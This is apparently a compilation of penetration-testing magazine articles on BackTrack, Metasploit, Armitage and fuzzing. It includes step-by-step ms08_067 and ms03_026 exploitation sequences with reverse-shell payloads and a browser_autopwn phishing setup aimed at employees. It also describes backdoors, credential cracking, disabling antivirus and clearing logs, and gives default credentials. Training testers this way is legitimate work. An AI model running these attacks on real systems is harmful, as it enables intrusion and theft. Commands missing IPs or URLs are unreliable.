Prone to virus attacks and provides more stability during penetration testing. It saves you time from
installing relevant components and tools, and who knows when you may encounter an unknown error during
the installation process. So, lets move on with installation of BackTrack 5 R3.
Either you can have a separate installation of BackTrack on your hard disk or you can also use it over a
host on a virtual machine. The installation process is simple and the same as installing any Linux-based
operating system.
The following steps show the entire process of installing BackTrack 5 R3:
When booting the BackTrack OS, you will be asked to enter the username and password. The default
username for the root user is root and the password is toor.
Upon successful login, you can either work over the command line or enter startx to enter in the GUI mode.
You can either start the Metasploit framework from the Applications menu or from the command line.
To launch Metasploit from the Applications menu, go to Applications | BackTrack | Exploitation Tools |
Network Exploitation Tools | Metasploit Framework, as shown in the following Figure 1:

Figure 1. Installing Metasploit with BackTrack 5 R3
Upgrading from R2 to R3
For those who dont want to start with the new installation, they can easily upgrade their existing installation
of R2 to R3.
First, we must make sure our current system is fully updated:
apt get update && apt get dist upgrade
The execution of this command will result in the installation of the new tools that have been added for R3.
Keeping in mind the system architecture, one must choose the right one.
32-bit tools
For installation on a 32-bit system, use the following command:
apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r
artemisa rifiuti2 netgear-telnetenable jboss- autopwn deblaze sakis3g voiphoney apache-users
phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney
twofi truecrack uberharvest acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy
ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc- check sslcaudit dhcpig
intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw
urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter bbqsql htexploit
smartphone-pentest-framework fern-wifi-cracker powersploit webhandler
bit tools
For installation on a 64-bit system, use the following command:
apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r rifiuti2
netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher
kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack
acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng
smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk
laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk
apktool ded dex2jar droidbox smali termineter multiforcer bbqsql htexploit smartphone-pentest-
framework fern-wifi-cracker powersploit webhandler
Installing and configuring PostgreSQL in BackTrack 5 R3
An important feature of Metasploit is the presence of databases, which you can use to store your penetration
testing results. Any penetration test consists of lots of information and can run for several days, so it
becomes essential to store the intermediate results and findings.
A good penetration testing tool should have proper database integration to store the results quickly and
efficiently. In this article, we will be dealing with the installation and configuration process of a database in
BackTrack 5 R3.
Metasploit comes with PostgreSQL as the default database. Let us first check out the default settings of the
PostgreSQL database. We will have to navigate to database.yml, located under opt/framework3/config. To do
this, run the following command:
root@bt:~# cd /opt/metasploit/config root@bt:/opt/metasploit/config# cat database.yml production:
adapter: postgresql database: msf3 username: msf3 password: 8b826ac0 host:
port: 7175
pool: 75
timeout: 5
Notice the default username, password, and default database that has been created. Note down these values, as
they will be required further along. You can also change these values according to your preference, as well.
Now, our job is to connect the database and start using it. Let us launch the msfconsole
interface and see how we can set up the databases and store our results.
Let us first check the available database drivers:
msf > db_driver
[*]Active Driver: postgresql [*]Available: postgresql, mysql
To connect the driver to msfconsle, we will be using the db_connect command. This command will be executed
using the following syntax:
db_connect username:password@hostIP:port number/database_name
Here, we will use the same default values of the username, password, database name, and port number,
which we just noted from the database.yml file:
msf > db_connect msf3:8b826ac0@
On successful execution of the command, our database is fully configured.
Getting an error while connecting to the database
There are chances of an error while trying to establish the connection. There are two things to keep in mind
if any error arises:
Check the db _ driver and db _ connect commands and make sure that you are using the correct
combination of the database.
Use start/etc/init.d to start the database service and then try connecting it.
If the error still prevails, we can reinstall the database and associated libraries using the following commands:
msf> gem install postgres
msf> apt-get install libpq-dev
Deleting the database
At anytime, you can drop the created database and start again to store fresh results. The following command
can be executed for deleting the database:
msf> db_destroy msf3:8b826ac0@ Database msf3 dropped.
Using the database to store the penetration testing results
Let us now learn how we can use our configured database to store our results of the penetration tests.
If you have successfully executed the previous article, you are all set to use the database for storing the
results. Enter the help command in msfconsole to have a quick look at the important database commands
available to us.
Let us start with a quick example. The db_nmap command stores the results of the port scan directly into the
database, along with all relevant information.
Launch a simple Nmap scan on the target machine to see how it works:
msf > db_nmap
[*] Nmap: Starting Nmap 5.51SVN ( ) at 2011-10-04 20:03 IST
[*] Nmap: Nmap scan report for [*] Nmap: Host is up (0.0012s latency)
[*] Nmap: Not shown: 997 closed ports [*] Nmap: PORT STATE SERVICE
[*] Nmap: 135/tcp open msrpc
[*] Nmap: 139/tcp open netbios-ssn [*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: MAC Address: 08:00:27:34:A8:87 (Cadmus Computer Systems)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 1.94 seconds
As we can see, Nmap has produced the scan results and it will automatically populate the msf3 database that
we are using.
We can also use the oX parameter in the Nmap scan to store the result in XML format. This will be very
beneficial for us to import the scan results in other third- party software, such as the Dradis framework,
which we will be analyzing in the next chapter:
msf > nmap A -oX report
[*] exec: nmap A -oX report
Starting Nmap 5.51SVN ( ) at 2011-10-05 11:57 IST Nmap scan report for
Host is up (0.0032s latency) Not shown: 997 closed ports PORT STATE SERVICE
135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp openmicrosoft-ds
MAC Address: 08:00:27:34:A8:87 (Cadmus Computer Systems) Nmap done: 1 IP address (1 host up)
scanned in 0.76 seconds
Here, report is the name of the file where our scanned result will be stored.
Now lets try to hack our victim
Method 1
Now open your backtrack terminal and type
cd /pentest/web/websploit
Step 1: choose option 3 Automatic Exploiter
Step 2: choose option 1 Service Autopwn
wsf: Autopwn > Enter Target IP Address: (IP Address of Victim)
We will see that port 445 is open so we will try to use the netapi exploit.
The microsoft-ds are a very common service in Windows machines. Most of the servers will have this service
enabled so it will be very easy to exploit them except if they are using a firewall that filters the port 445.
Step 3: Type Search netapi command in the console, this command will search for all the exploit modules
with the pattern netapi
Step 4: type use exploit/windows/smb/ms08_067_netapi
Msf exploit (ms08_067_netapi)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms08_067_netapi)>set lhost (IP of Local Host)
Msf exploit (ms08_067_netapi)>set rhost (IP of Local Host)
Msf exploit (ms08_067_netapi)>exploit
Method 2
In this method we will hack into the victim machine by using the RPC DCOM. Its a buffer overflow attack
that enables the attacker to execute any code of their choice on the owned box (note Microsofts comment
under impact of vulnerability). Microsoft identifies it as MS03-026 in their database of vulnerabilities. In our
case, we will use it to open a reverse shell on our target system.
Step 1: Open the the Metasploit console
Be patient, it takes awhile for Metasploit to load all of its modules. The current version of Metasploit has
823 exploits and 250 payloads.
Step 2: Find the Exploit
Metasploit allows you to search using the search command. In our case, we are searching for a DCOM
exploit, so we can simply type:
msf > search dcom
Step 3: Set the Exploit
Now lets tell Metasploit what exploit we want to use. Type use and the name of our exploit, exploit/windows/
msf > use exploit/windows/dcerpc/ms03_026_dcom
Note that the prompt has changed and now reflects our chosen exploit.
Step 4: Set the Options
Now that weve chosen our exploit, we can ask Metasploit what our options are. By typing show options,
Metasploit will list our options in executing this exploit.
msf > show options
Step 5: Set Remote Host
Metasploit will now ask us for the RHOST. This will be the IP address of the remote host or the machine
were attacking. In our case, its Use the actual IP address of the machine you are attacking.
Tools such as nmap can help in identifying the IP address of the machine you are attacking. Notice in the
picture above that Metasploit tells us that we will be using (binding) port 135.
msf > set RHOST
Step 6: Show Payloads
Next, we check to see what payloads are available for this exploit. Type show payloads at the Metasploit prompt:
msf > show payloads
Step 7: Set Payload
Now that we can see what payloads are available, we can select the generic/shell_reverse_tcp by using the Metasploit
console set command. If successful, this will establish a remote shell on the target system that we can command.
msf > set PAYLOAD generic/shell_reverse_tcp
Step 8: Set Local Host
Now that weve chosen the exploit and the payload, we need to tell Metasploit the IP address of our
attacking machine. In this example, our target system has an IP address of Use the actual IP
address of the system you are attacking. Tools such a nmap, can help you obtain IP addresses.
msf > set LHOST
Step 9: Exploit
Now we command Metasploit to exploit the system:
msf > exploit
Step 10: Open a Shell on the Hacked System
Type the command sessions i 1 to open a command shell on the XP system that will appear on your
Metasploit console.
sessions i 1
To confirm that the command shell is on the Windows XP system, type dir to get a directory listing on the
Windows XP system that you now own!
C: >dir
In this article, we have learned how to perform a network vulnerability assessment by using Metasploit tool kit.
BackTrack Linux:
About the Author
Maher Abdelshkour is a Sr. Network Engineer and Information Security Analyst III in a large Company for the
past 16 years, in the field of Information Technology with extensive network engineering, administration, and
troubleshooting experience in Enterprise and Service Provider networks. He is an expert in intrusion detection
systems, Penetration Testing and in designing systems to meet externally defined security standards.
Multiphase Penetration Testing:
Using BackTrack Linux, Metasploit, and
by Lance Cleghorn, Associate of ISC2: CISSP
The EC Council identifies five stages of attack that are common to cyber penetration. [1]
These stages of attack may be used to categorize incidences where a network or host has
been compromised. Considering that these stages are common to real attacks, they are used
by ethical hackers to conduct penetration testing. An ethical hacker, or white-hat hacker, may
use these steps in order or may selectively choose the steps that work best for their particular
vulnerability. [2]
When a penetration tester begins to examine a target they often enter the first phase of attack the reconnaissance
phase. In this first phase of attack, the attacker or tester tries to discover as much information about the
victim as possible. In some cases this phase may involve choosing a target if there is no specific target given.
(Penetration testers are often given a target, whereas attackers must decide on one.) [5] This phase may involve
using search engines or other Internet based utilities to learn about the target. [1]
After a target has been chosen the tester must attempt to enumerate the target as much as possible.
This enumeration is referred to by the EC Council as the scanning phase. [1] While enumeration does
occur to some extent in the reconnaissance phase it is in the scanning phase that enumeration occurs
the most. The tester will try and uncover detailed information about services by viewing banners
presented when ports are presented with requests. [4] This phase also may involve scanning a large
target to identify a smaller subset of vulnerable nodes. [8]
After the tester has enumerated targets in the scanning phase they begin to plan and preform the third phase,
the gaining access phase. [1] In the gaining access phase the tester will plan a strategy to attack targets
and compromise confidentiality and integrity. The tester will need to confirm the level of overtness they
are comfortable with; based on this level of comfort the tester will begin to attack the vulnerable nodes
and services. This phase is considered complete when the tester has a foothold in the target. [1] The tester
may choose to segment this phase into a second part where the tester spreads and expands the foothold;
alternatively the tester could complete all phases and begin again in order to expand the foothold.
After establishing an initial foothold in the victim, the tester must aim to maintain that access for a long
term compromise. In a real world compromise the attacker is aiming to dig in and capture data that crosses
through the victim, maintaining access is the phase where the tester solidifies their grip on the target. [12]
In this phase the tester brings tools into the victim and sets up backdoor services that the tester can use to
bypass authentication mechanisms. The testers primary goal in this phase is to make it easier to access
the victim, and also to make access seem more legitimate by adding valid credentials and impersonating
legitimate usage. [4]
In the final fifth phase the tester works to cover up the evidence that a vulnerability has been exploited and
an attacker gained access. [1] There are several motivations for ensuring that this phase is accomplished
correctly. In a real attack scenario the attacker will wish to destroy evidence to avoid being detected, and if
detected to avoid prosecution. [4] The tester will delete logs and try to manipulate detection methods to not
report the compromise. The EC Council refers to the final phase of the multiphase attack as the covering
tracks phase. [1]
Metasploit, Armitage, and BackTrack
Metasploit was designed as a framework that penetration testers could use to load exploits into and conduct
tests against vulnerabilities. [9] The Metasploit framework is coded and hosted by the security organization
Rapid7 and is currently on version 4.6. [9] The framework is continually updated with new and modified
modules that may be executed to find and test vulnerabilities. The framework is made up of almost a dozen
command line utilities that may be used in conjunction. Considering that the framework is command line
based and requires quite a substantial learning curve Strategic Cyber LLC designed the Armitage graphical
user interface (GUI). [3]
Armitage is a frontend for the Metasploit framework and can be used to organize and execute a multiphase
penetration test. Many security professionals new to the field of penetration testing prefer to learn the
Metasploit framework through the Armitage GUI. [5] While there are some functions of the Metasploit
framework that may require you to delve into the command line, many of the phases of attack can be
accomplished through Armitage. Many veterans of the security penetration testing field have acknowledged
that penetration testers should utilize GUIs like Armitage because it is more similar to the utilities used by
actual attackers. [4]
Both Metasploit and Armitage have come as standard installs in the BackTrack distribution of Linux since
version 5. BackTrack Linux is widely considered the operating system of choice for penetration testers. [5]
The operating system includes a plethora of utilities to aid in preforming penetration tests. An experienced
user is often able to use the distribution to conduct a full multiphase penetration test without having to access
the nternet to download additional tools or documentation. BackTrack is currently on Version 5 revision
number 3, although this may be the last revision to use the name BackTrack as developers intend to have the
next version be referred to as Kali Linux.
Reconnaissance Phase
Considering that many penetration testers know their target prior to beginning a test, the reconnaissance
phase is largely limited to sniffing the network. BackTrack includes several options for sniffing traffic as
shown in Figure 1. Wireshark is an industry favorite because of the sophistication of the GUI. A tester can
leverage Wireshark or a comparable network monitor to capture traffic passively as it passes through from
node to node. [8] A packet capture is a treasure trove of information for a skilled penetration tester. The tester
can scan and filter a packet capture to look for vulnerable services and even begin to capture usernames,
hostnames, and in some cases passwords.
Figure 1. BackTrack Sniffing Tools
Wireshark and other sniffer programs work by placing the network interface card (NIC) into promiscuous
mode. In normal operation the NIC accepts traffic addressed to the address it has and discards everything
else, in promiscuous mode the NIC accepts all traffic. A tester using Wireshark can design specific filters to
look for important information in the packet capture; the tester may also choose to run the packet capture
through a set of Snort rules to look for vulnerabilities. Snort is an open source intrusion detection system
where an administrator can write rules to look for traffic patterns. [11]
Snort is a more robust solution for traffic pattern matching than Wireshark and thus the two may be used in
conjunction to perform the reconnaissance phase of an attack. [11] At this point in the multiphase attack, the
tester should have an idea of vulnerable services or nodes and ideally some credentials. The tester should not
skip this phase; however, they should also not spend too much time in this phase as other phases are more
likely to yield greater benefits.
Scanning Phase
In the scanning phase Metasploit and Armitage begin to become more prolific in the penetration testing
process. Nmap and many other enumeration modules are provided in the Metasploit framework and
Armitage can assist in organizing information garnered in this phase. Nmap is a utility that has been used by
networking professionals for many years and is preferred because of its simplicity and robust options. [4]
Figure 2 shows the enumeration modules available in the Metasploit framework.
Figure 2. Armitage Enumeration Modules
Many testers wish to scan the network using a light ping sweep or in a less secure network a service scan.
Nmap can provide both of these options as well as options for avoiding intrusion detection and prevention
systems. Nmap is an extraordinary utility for enumerating the Internet protocol stack, Metasploit and
particularly Armitage are able to store and utilize the outputs from Nmap. After enumerating the addressing
schemes and services the tester is better able to target particular parts of the network, and the tester may
begin to map the target network.
A good penetration tester should feel comfortable with making use of all the tools available to them. Figure 3
shows the BackTrack utilities for scanning and enumeration that may be used by a penetration tester. Nessus
is a vulnerability scanner used by the United States Department of Defense and trusted by many penetration
testers. [4] Nessus results and other standard scanning formats may also be imported into Armitage to
identify hosts, services, and vulnerabilities. The tester should have a solid plan at this point with prime
targets in mind and a list of attacks to perform in the third phase of attack.
Figure 3. BackTrack Scanning and Enumeration Tools
Gaining Access
The third phase of the multiphase attack is where testers or attackers cross a line and gain access to nodes in
an unauthorized manner. The tester must balance conducting a successful penetration test and maintaining
the integrity of a clients network. Clients have to weigh the benefit of a real world penetration test with the
potential harm it could do to their production network. A talented penetration tester should understand the
limits of their tools, and at what point they become a threat to the availability of the production network.
The third phase also represents a choice for the penetration tester. The multiphase attack methodology can
be used as a one pass method where the tester only goes through the phases once or it can be conducted
multiple times throughout the areas of the network. If the tester chooses to only work through the phases
once, the third phase of gaining access should be divided into two subsections. In the first subsection the
tester will try and gain access and in the second subsection the tester will spread to all the targets identified
in the scanning phase.
Deciding between working the phases once and going through them multiple times can depend on the target
network itself or the testers personal preferences. A larger network that is easily devisable into smaller
sections may be more effectively tested by using the multiphase approach more than once. In either case the
tester must consider using a compromised host as a Launchpad for further exploit. [6] This consideration
must be carefully evaluated by a tester because it may skew results. A vulnerability may only be exploitable
if another host has already been compromised. [6] The tester should always denote Launchpad tests in a
final report and make sure the client understands the methodology behind the tests. The tester must always
consider that an attacker will utilize any method available to them and certainly leverage a Launchpad
scenario to gain access.
In this phase the tester will begin running exploits against the vulnerabilities identified in the scanning phase.
Metasploit includes modules that can perform a wide array of attacks; in order to fully gain access the tester
should be able to prove access to the confidentiality of a system or a set of data. [10] The tester can choose
from an array of attacks, a brute force may be appropriate for a telnet service where as a directory traversal
attack may be best on an FTP or HTTP web server. Choosing the proper exploits to use in order to gain
access is an essential part of penetration testing. If the tester runs too wide a variety of exploits they increase
the risk of being detected and prevented. The tester must rely heavily on information from the first two
phases in order to choose the exploits with the highest chance of success.
Deciding on a proper payload is another key factor in the gaining access phase. The tester may only get
one payload to the target, and deciding if that payload should simply alert on a success or attempt to fully
compromise the host is important. Going with too strong of a payload that does too much may guarantee
detection by a host-based defense mechanism; conversely some exploits by their very nature only work once
before crashing a service so a conservative payload may cost the tester a successful access. Metasploit has
a custom shell environment called Meterpreter that may be packaged as a payload, many testers choose this
payload because it has a small footprint, is very versatile, and is loaded with penetration testing functionality. [7]
Maintaining Access
Once the tester has gained the initial foothold in the target network the maintaining access phase begins
where the tester tries to solidify their grip on the target. In the maintaining access phase the Meterpreter shell
environment becomes much more important. Meterpreter has options and settings that can be manipulated
directly from the Armitage GUI. Armitage can use Meterpreter to import additional tools to the victim and
set up backdoors.
Netcat is a backdoor utility that can easily be imported and set up using Meterpreter. There are many other
utilities that can also be imported to create a backdoor. [4] Rather than choosing to set up a malicious
backdoor service experienced penetration testers often try to emulate legitimate traffic as much as possible,
one way to effectively masquerade as an authorized user is to obtain valid credentials. Valid credentials are
arguably some of the most important information a penetration testers or attacker can uncover. Meterpreter
and Armitage have some options for obtaining sets of valid credentials.
Meterpreter is best designed to exploit hosts running Windows operating systems, while Meterpreter can run
on Linux and UNIX based hosts, it is more limited than on a Windows host. [7] Meterpreter is able to export
Windows LM Hashes directly into password cracking utilities, the shell can also export Linux shadow files
but it may require more interaction from the penetration tester. For Windows targets Armitage can accept LM
Hashes from Meterpreter and begin to directly crack them in John the Ripper a popular password cracking
utility. Figure 4 shows Armitage cracking passwords from Meterpreter using John the Ripper. The unified
interface allows for penetration testing optimization and organization of important information. A penetration
tester must consider that the specific vulnerability they used to compromise the target may eventually be
patched and the objective of the maintaining access phase is to have other options for access.
Figure 4. Armitage Password Cracking
Covering Tracks
In the final phase of penetration testing, the tester should attempt to cover up the evidence of the compromise
ever occurring. A penetration tester must take extra consideration during this phase; the tester does not want
to remove information that could be valuable in explaining and reporting the test to the client. A real world
attacker would not be so kind as to refrain from covering their tracks but the penetration tester may need
that information as a teaching tool. One method that penetration testers may find valuable is to back up logs
and other information prior to deleting them, this way the clients IT staff may be evaluated on their forensic
abilities, and log information is still available to show testing results.
Meterpreter includes a particularly useful script for clearing Windows logs. The script (log.clear) can be
executed from a Meterpreter shell environment. [7] By default the script only clears the system event log;
however, the script can be configured to clear all logs. The covering tracks phase may seem straightforward,
but it can be deceptively difficult to accomplish. One way to make the covering tracks phase easier to
accomplish is to work the phases while considering them all in as new assets become available.
Working the Phases Holistically
The phases are designed in a chronological order, but they do not have to always be carried out in that direct
order. There are many cases where considering the phases as a whole will yield benefits, an experienced
penetration tester is able to make decisions during the test that will positively impact the later actions in the
test. [5] Taking for example the covering tracks phase, this phase may be accomplished more effectively if
logging does not occur. In the third phase, gaining access, the penetration tester can utilize scripts built into
Metasploit to disable Anti-Virus and Firewalls on compromised hosts.
Some actions come with experience, but a skillful penetration tester can take some steps to perform a better test.
At the beginning and end of each phase the penetration tester should consider what new options are now available
and if these options open any new opportunities. The tester should evaluate the phases that come before and after
the current phase; any new options that could improve the other phases should be evaluated and pursued.
A penetration tester is well served by putting a methodology to their testing strategy. Much like networking
professionals utilize the OSI model to organize and troubleshoot networking issues, the penetration tester
can utilize the EC Council five phase attack plan to organize the penetration test. [1,8] The five phases
must be considered chronologically as they were designed, but the phases may best be utilized if evaluated
holistically. Working through each phase carefully while continually looking at the testing plan as a whole, is
the most effective way to leverage the five phase model.
A penetration testers tool kit should be an extension of the tester themselves. Knowing what utilities
are available to the tester and using those tools to their full potential is essential. BackTrack Linux is a
distribution designed specifically for penetration testers, the tools contained in BackTrack are designed to
accomplish a full multiphase penetration test. [5] Metasploit and the accompanying Armitage GUI are two
key tools in a skilled penetration testers tool kit. [3,9] The robustness of Metasploit and the organization
capabilities of Armitage make these tools stand out among alternatives.
Tools will change, but a strong methodology will stay current through changes in technology. A good
penetration tester works to understand the resources available to them and how these resources can be
applied effectively in each phase. Carefully planning a penetration test can occur prior to ever receiving a
job, while the target does change applicable tools a good penetration tester can prepare for many different
scenarios. Practicing using lab environments and virtual technologies will assist a tester in compiling a
strong tool kit. The best penetration tester prepares, and is interested in continually improving their craft
through practice.
About the Author
Lance Cleghorn A North Carolina native received a Bachelor of Science degree in
Information Technology from East Carolina University. Graduating Suma Cum Laude
Lance completed his undergraduate degree in 2012. As an undergraduate student
Lance concentrated in Cisco networking technology. Lance is currently pursuing a
Master of Science in Information Security at East Carolina University. Lance holds
several major industry certifications including the Associate of ISC2 towards a CISSP,
CCNP, CompTIA Security+, EMCISA, and MCP.
Pentesting Windows using Metasploit
by Omkar Prakash Joshi
The Metasploit Project is a computer security project that provides information about
security vulnerabilities and resource to penetration testing and IDS signature development.
Its well-known sub-project is the open source Metasploit Framework (MSF), a tool for developing and
executing exploit code against a remote (target) machine. Other important sub-projects include the Opcode
Database, shell code archive etc.
The Metasploit Project is also well known for its anti-forensic and evasion tools, some of which are built
into the Metasploit Framework.
The Metasploit Framework is both a penetration testing system and a development platform for creating
security tools and exploits. The framework is used by network security professionals to perform penetration
tests, system administrators to verify patch installations, product vendors to perform regression testing, and
security researchers world-wide. The framework is written in the Ruby programming language and includes
components written in C and assembler.
Lab Setup
In this I am going to demonstrate all attacks in virtual environment.
I am going to use VMware Workstation for virtual demonstration. In this workstation I have created 2 virtual
machines as:
Attacker Machine (Kali Linux)
Client or victim machine (Windows XP Professional)
All this demonstration will be in virtual environment which is VMware Workstation 10.
Metasploit was created by HD Moore in 2003 as a portable network tool using Perl. By 2007, the
Metasploit Framework had been completely rewritten in Ruby. On October 21, 2009, the Metasploit
Project announced that it had been acquired by Rapid7, a security company that provides unified
vulnerability management solutions.
Like comparable commercial products such as Immunitys Canvas or Core Security Technologies Core
Impact, Metasploit can be used to test the vulnerability of computer systems or to break into remote systems.
Like many information security tools, Metasploit can be used for both legitimate and unauthorized activities.
Metasploit Framework (MSF)
MSF to be one of the single most useful auditing tools freely available to security professionals today.
From a wide array of commercial grade exploits and an extensive exploit development environment,
all the way to network information gathering tools and web vulnerability plugins. The MSF is far more
than just a collection of exploits, its an infrastructure that you can build upon and utilize for your
custom needs.
Metasploit Terms
Exploit to take advantage of a security flaw within a system, network, or application.
Payload code that our victim computer to execute by the metasploit framework.
Module a small piece of code that can be added to the metasploit framework to execute an attack.
Shellcode a small piece of code used as a payload.
Msfconsole is an all-in-one interface to most of the features in metasploit. Msfconsole can be used to launch
attacks, creating listeners, and much, much more. I am going to use msfconsole for various attacks. To launch
console command is msfconsole
Figure 1. Running msfconsole command
Msfcli is another way to access the metasploit framework but focuses more on scripting and interpretability
with other console-based tools. To view the msfcli help command is msfcli -h.
Figure 2. Listing help for msfcli
Now I am going to do a little practice on msfcli. Whenever learning metasploit and if you get stuck, you
can see the options in a module by adding the letter O to the end of the line. E.g. I am using windows/smb/
ms08_067_netapi exploit to perform attack on windows based machines as,
Figure 3. Listing options of exploit
This module requires three options: RHOST, RPORT, and SMBPIPE. Adding p to the end allows us to see
what payloads we can use. It will list out all the payloads present in framework. Its better to keep updated
your framework so that you can use or practice on latest exploits & payloads to perform penetration testing
or security assessment.
Figure 4. Setting up RHOST
We can run our exploit by selecting a payload, fill out the options, and run it by passing the letter E to the
end of the msfcli argument string. Right now I am selecting windows/shell/bind_tcp payload as:
Figure 5. Setting up the payload
Once it has done with all steps, it will exploit on target machine which is windows XP based & will gives
you meterpreter session. Now you will be able to access target machine without knowing to target.
The msfpayload component of metasploit that generates shellcode, and executables. Shellcode can be
generated in many formats including C, Ruby, JavaScript and even Visual Basic. Each output will be useful
in various situations.
Just like msfcli, if you need to find out the required options, append the letter O on the command line.
Figure 6. Listing out options for payload
Exploiting with browser_autopwn
Nowadays due to firewall restrictions and patch management policies exploitation of systems has become
much more difficult. However one of the most efficient way is the use of client-side attacks. Client side
attacks requires the user interaction and in most of the cases can be used through social engineering
engagements. An employee which will not have the necessary knowledge to understand the risks of opening
untrusted links can help an attacker to exploit any internal systems. Also the fact that browsers are not
patched as often as operating systems makes the problem bigger.
The basic idea behind that module is that it creates a web server in our local machine which will contain
different kind of browser exploits. When the user will open the malicious link then the execution of the
exploits will start against the browser of the user and if one of the exploits is successful a meterpreter session
will open.
In order to use this attack we have to open the metasploit framework and to use the browser_autopwn module.
I will select browser_autopwn auxiliary using msfconsole as,
Figure 7. Selecting auxiliary browser_autopwn
Now I will set up the LHOST with our IP address (Host IP), the SRVPORT with the port 80 (otherwise the
link that we have to send to the user must me in the format IP:8080) and the URIPATH with / in order to
prevent metasploit to set up random URLs.
Figure 8. Listing out & setting options
After the execution of this module we will notice that different exploits for a variety of browsers will start
loading to our web server.
Figure 9. Running auxiliary
Now we can share the link through our email to our client employees. If any user opens the malicious link,
the autopwn module will try all these exploits in order to see if it can break into the client. If the browser is
vulnerable to any of these exploits meterpreter sessions will open.
This can be done within network easily if we will be able to redirect any of the website to this malicious IP
address using DNS poisoning or other techniques it is possible.
Figure 10. Listing out & selecting session ID
Figure 11. Meterpreter session of windows
In this way we can do penetration testing or exploitation over windows OS using metasploit framework.
Most of the organizations are behind proxy firewalls, so only the port 80 is allowed. From the other hand
many employees are using social networks these days for various reasons. An attacker can exploit that and
send malicious links through the social networks to users so the use of this attack can be very effective
against companies as it contains exploits for most of the popular browsers and it only requires the mistake of
one person in order to be successful. Metasploit Browser Autopwn module is the proof of how dangerous is
to open links that are coming from untrusted sources.
About the Author
CEH, CHFI, ECSA/LPT, ISO 27001 LA, Cyber Forensic Investigator, Digital
Evidence Analyst, Information Security Consultant & Researcher
I have been working with IT field for the last year. I am independent security
researcher. I acquired knowledge & experience in Computer & Mobile Forensics as
well as Information Security & Ethical Hacking Training. I have acquired several
certifications like CEH, CHFI, ECSA/LPT, ISO27001 Lead Auditor, and Cyber Crime
Investigator. I give training to corporate as well as students in Mobile & Computer
Forensics. I am currently working in Fluxonix Corporation, Pune as Knowledge
Engineer Manager Computer Forensics.
Published 3 articles related to Android-iOS hacking & forensic in International
For more my profile on Facebook &
on LinkedIn
& my email ID
Metasploit for Exploits Development: the
Tools Inside the Framework
by Guglielmo Scaiola
A lot of people use metasploit to gain access to hosts and networks, in ethical manner
or not, in some case the operation is very simple, if you like the GUI versions, Rapid 7
professional or Armitage, for example, the attack is like a point and exploit activity, also
the post exploitation task and the pivoting are very simple, but not all people know the fact
that the framework born for ALL the exploit lifecycle, start with fuzzing tools and end with
usable and integrated modules. Today I want to point my focus to this second aspect of the
framework. I dont want to teach you who you can write an exploit, but who you can you use
the framework for do this, for this reason I start with a well know exploit, the Ability Server
2.34 STOR buffer overflow, who as the OSCP certification know very good this exploit, and
a lot of PoC are on the Internet (
Buffer_Overflow, ), the today task is fuzzing
and exploiting only with the metasploit tools. If you need more information of the exploit you
can read this two websites:
If you search in the metasploit and metasploit/tools directories, you can find a lot of interesting piece of
rubyok, lets start watching the directories:
Figure 1. Metasploit framework directory
Figure 2. The tools directory
Today for my lab I use my favorite backtrack 5 R3 machine and an old virtual machine with installed Windows
XP SP3 in Italian, this is very interesting because as you can see on, the target of the module
are only:
Exploit Targets
0 Windows XP SP2 ENG
1 Windows XP SP3 ENG
In real world if you need to exploit this machine, you cant only use the pre-existing module.
The backtrack machine has IP and the target has
Figure 3. My windows machine
In this machine I have installed (copied) the CodeCrafters Ability Server 2.34, if you dont have you can find
the file in Emule. When you start the server you need to bypass the freeware banner.
Figure 4. Ability Server: the freeware banner
And you are in the menu
Figure 5. Ability Server: home
Now I set up the username and the password (is also useful to flag Auto Activate).
Figure 6. Ability Server: configuration
Before starting with fuzzing is a good idea to test the connection between the two virtual machine, for do this
you can use the command ftp:
root@yamabushi:/CEH/sample scripts/D4# ftp
ftp> open
Connected to
220 Welcome to Code-Crafters Ability Server 2.34. (Ability Server 2.34 by Code-Crafters).
Name ( ftp
331 Please send PASS now.
230- Welcome to Code-Crafters Ability Server 2.34.
230 User ftp logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
If you need to write your own fuzzer you need to know the command of this ftp server, you can use the ftp
command help:
Figure 7. Connection with ftp server
Ok, the ftp server works fine, now I want to start with fuzzing, I start the msfconsole and I start trying if the
application is vulnerable, in msfconsole we have different fuzzers for different services.
Because I want to find vulnerability in FTP server, I will use auxiliary/fuzzers/ftp/ftp_pre_post, this module
can fuzz vulnerability in pre-auth phase, and also is able to fuzz post authentication commands (http://www.
Figure 8. Fuzzers
Figure 9. ftp_pre_post
Now I load the module and I put the target data in the module: the target IP, the username and the password.
use auxiliary/fuzzers/ftp/ftp_pre_post
set USER ftp
set PASS ftp
Figure 10. Setting ftp_pre_post
But if you show the options you can find a lot of other options, the most important, in this case, for time
optimization is STARTASTAGE, with this options I can choose the stage of FTP which I want to analyze,
Issue no command, only send evil data
Fuzz the USER command
Fuzz the PASS command (after a valid USER command/login was executed)
Fuzz all FTP commands (after a valid login was performed), one command, one fuzz string per session
Fuzz all FTP commands (after a valid login was performed), one command with all fuzz combinations for
that command per session
Today I dont want to try pre-auth phase and I will choose the stage 4. If you want to show the commands to
fuzz in this stage you can type show advanced, for default the tools try all FTP commands, for this demo I
will remove some commands to save time, with:
set FtpCommands CWD STAT STOR
I try only CWD STAT and STOR If you need more info on stage you can watch on the site: https://www., in this article I want also
shorten the test setting the ENDSIZE to 2000 (the default value is 20000) and the STARTSIZE and the
Now you can start fuzzing with the command run, on the video you can see the command and the number of
characters sent on target
Figure 11. Starting ftp_pre_post
If the application is vulnerable, when the size of the payload reach the size of the stack, the server crash with
an exception.
Figure 12. The crash windows
